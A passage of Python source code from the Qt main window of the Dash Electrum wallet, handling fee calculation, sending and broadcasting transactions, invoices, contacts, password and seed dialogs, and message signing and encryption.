except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee * 1000 / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee * 1000 / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/kB feerate
amount = 0 if amount is None else amount # sat/kB feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
tx_type, extra_payload = self.extra_payload.get_extra_data()
return outputs, fee_estimator, label, coins, tx_type, extra_payload
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Dash Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Dash Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
(outputs, fee_estimator, tx_desc, coins,
tx_type, extra_payload) = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep,
tx_type=tx_type, extra_payload=extra_payload)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
if tx.tx_type:
try:
tx.extra_payload.check_after_tx_prepared(tx)
except DashTxError as e:
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_kb())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.extra_payload.clear()
self.hide_extra_payload()
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
l.setObjectName("utxo_container")
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
l.setObjectName("contacts_container")
return self.create_list_tab(l)
def create_proposals_tab(self):
from .masternode_budget_widgets import ProposalsTab
self.proposals_list = ProposalsTab(self)
return self.proposals_list
def update_proposals_tab(self):
# Disabled until API is stable.
return
if not self.masternode_manager:
return
self.proposals_list.update(list(self.network.all_proposals))
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def hide_extra_payload(self):
self.extra_payload.hide()
self.extra_payload_label.hide()
def show_extra_payload(self):
self.extra_payload.show()
self.extra_payload_label.show()
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
console.setObjectName("console_container")
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_dash,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setObjectName("main_window_balance")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_dash.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Dash Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_dash.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Dash Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_dash import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a dash URI
if str(data).startswith("dash:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
